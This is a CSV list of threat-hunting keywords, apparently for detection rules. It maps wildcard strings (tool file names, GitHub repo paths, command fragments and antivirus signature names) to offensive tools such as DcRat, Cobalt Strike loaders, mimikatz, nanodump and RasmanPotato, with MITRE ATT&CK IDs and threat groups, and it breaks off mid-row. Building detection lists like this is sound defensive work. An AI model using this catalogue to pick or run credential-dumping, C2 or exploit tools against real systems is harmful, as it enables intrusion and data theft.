+"*qwqdanchun/DcRat*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA*","offensive_tool_keyword","mimikatz","invoke mimiaktz string found used by the tool EDRaser ","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" +"*QXh4OEF4eDhBeHg4QXh4OA==*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" +"*r00t-3xp10it*","offensive_tool_keyword","Github Username","Pentest hosting multiple offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*r0oth3x49/Tor.git*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" +"*r1cksec/thoth*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" +"*r2pm -i dirtycow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","0","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" +"*r4wd3r/Suborner*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" +"*Radare2*","offensive_tool_keyword","Radare2","r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.Radare project started as a forensics tool. a scriptable command-line hexadecimal editor able to open disk files. but later added support for analyzing binaries. disassembling code. debugging programs. attaching to remote gdb servers","T1057 - T1064 - T1059 - T1202","TA0002 - TA0008 - TA0001","N/A","N/A","Information Gathering","https://github.com/radareorg/radare2","1","0","N/A","N/A","10","18645","2913","2023-10-04T08:34:11Z","2012-07-03T07:42:26Z" +"*radius2john.pl*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*radius2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*RAI/ase_docker*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*rai-attack-servers.*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*RainbowCrack*","offensive_tool_keyword","RainbowCrack","The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one. which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called rainbow tables. It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished. For downloads and more information. visit the RainbowCrack homepage","T1110 - T1208 - T1212 - T1609","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Credential Access","http://project-rainbowcrack.com/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*rai-redirector-dns*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*rai-redirector-http*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*raiseChild.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*rajkumardusad/onex*","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","1","N/A","N/A",,"N/A",,, +"*rajkumardusad/Tool-X*","offensive_tool_keyword","Tool-X","Tool-X is a Kali Linux hacking tools installer for Termux and linux system. Tool-X was developed for Termux and linux based systems. Using Tool-X you can install almost 370+ hacking tools in Termux (android) and other Linux based distributions. Now Tool-X is available for Ubuntu Debian etc.","T1212 - T1566 - T1550 - T1133","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/Tool-X","1","1","N/A","N/A",,"N/A",,, +"*RAMDOMdd28f0dcd9779315ee130deb565dbf315587f1611e54PASSWORD*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*random_c2_profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*random_c2profile.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*random_user_agent.params*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*random_user_agent.user_agent*","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","545","83","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" +"*randomalice1986@*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","email user name","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"*-RandomAttackPath -Token*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" +"*randombob1986@*","offensive_tool_keyword","dnstwist","See what sort of trouble users can get in trying to type your domain name. Find lookalike domains that adversaries can use to attack you. Can detect typosquatters. phishing attacks. fraud. and brand impersonation. Useful as an additional source of targeted threat intelligence.","T1560 - T1565 - T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","1","email user name","3","10","4154","709","2023-10-01T22:26:34Z","2015-06-11T12:24:17Z" +"*randomize_sw2_seed.py*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"*Ransom.Win32.*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword for ransomware","T1486 - T1489 - T1490 - T1485 - T1487 - T1491 - T1492 - T1488 - T1493 - T1497","TA0007 - TA0003 - TA0002 - TA0004 - TA0006 - TA0010","N/A","N/A","Ransomware","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver/indicators-blackcat-ransomware-deploys-new-signed-kernel-driver.txt","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Ransom:Win32*","signature_keyword","Antivirus Signature","AV signature for exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","ransom signatures","10","10","N/A","N/A","N/A","N/A" +"*Ransom:Win32*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Ransom:Win64*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Malware","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*Ransom_Petya*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Ransomware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Ransom_WCRY*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Ransomware","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*Ransomware POC tool that encrypts a given directory*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*Ransomware.dll*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*Ransomware.pdb*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*ransomware_config.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*ransomware_payload.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*Ransomware-E20F7CED-42AD-485E-BE4D-DE21DCE58EC0.json*","offensive_tool_keyword","power-pwn","An offensive and defensive security toolset for Microsoft 365 Power Platform","T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002","TA0003 - TA0004 - TA0005 - TA0001","N/A","N/A","Exploitation tools","https://github.com/mbrg/power-pwn","1","1","N/A","10","4","360","34","2023-09-12T12:44:44Z","2022-06-14T11:40:21Z" +"*RansomwarePoc.cpp*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*RansomwarePoc.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","1","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*RansomwarePoc\RansomwarePoc*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*Rapid7*","offensive_tool_keyword","rapid7","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.rapid7.com/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*rapid7.github.io/metasploit-framework/api/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*Rar a -v3g -k -r -s -m3 *","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*rar2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*rar2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*rarce *.pdf *.rar*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*rarce *.rar*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*rarce-1.0.0.tar.gz*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*rarce-1.0.0-py3-none-any.whl*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*rasman*whoami*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*RasMan.cpp*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*RasMan.sln*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege 